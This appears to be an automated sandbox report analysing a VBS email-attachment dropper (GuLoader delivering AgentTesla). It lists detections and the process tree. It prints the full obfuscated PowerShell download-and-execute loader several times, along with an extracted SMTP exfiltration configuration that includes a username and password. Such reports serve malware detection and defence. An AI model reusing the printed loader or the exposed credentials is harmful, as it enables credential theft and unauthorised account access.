Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Zapytanie ofertowe (GASTRON 07022024).vbs

Overview

General Information

Sample name:Zapytanie ofertowe (GASTRON 07022024).vbs
Analysis ID:1466650
MD5:d1d5fd7033560a49ca0f5c010a8fded5
SHA1:d1dba8603565c80a3d7f14fe1f61a2829f56d2c9
SHA256:e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5532 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2960 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7004 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5836 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 3736 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • fMNDB.exe (PID: 6208 cmdline: "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3040 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • fMNDB.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fiszebrandt.pl", "Username": "andrychow@fiszebrandt.pl", "Password": "Brandt2019"}
SourceRuleDescriptionAuthorStrings
00000016.00000002.3758847608.000000002303A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000014.00000002.2919321134.0000000008200000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000016.00000002.3758847608.000000002300F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_4704.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7004.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xddd9:$b2: ::FromBase64String(
              • 0xce3c:$s1: -join
              • 0x65e8:$s4: +=
              • 0x66aa:$s4: +=
              • 0xa8d1:$s4: +=
              • 0xc9ee:$s4: +=
              • 0xccd8:$s4: +=
              • 0xce1e:$s4: +=
              • 0x15c87:$s4: +=
              • 0x15d07:$s4: +=
              • 0x15dcd:$s4: +=
              • 0x15e4d:$s4: +=
              • 0x16023:$s4: +=
              • 0x160a7:$s4: +=
              • 0xd675:$e4: Get-WmiObject
              • 0xd864:$e4: Get-Process
              • 0xd8bc:$e4: Start-Process
              • 0x16946:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", ProcessId: 5532, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 3736, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fMNDB
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 195.128.154.10, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 3736, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs", ProcessId: 5532, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: cmd.exe.5836.21.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fiszebrandt.pl", "Username": "andrychow@fiszebrandt.pl", "Password": "Brandt2019"}
              Source: Zapytanie ofertowe (GASTRON 07022024).vbsVirustotal: Detection: 9%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.2906407950.0000000000473000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000014.00000002.2918369261.0000000007DE0000.00000004.00000020.00020000.00000000.sdmp
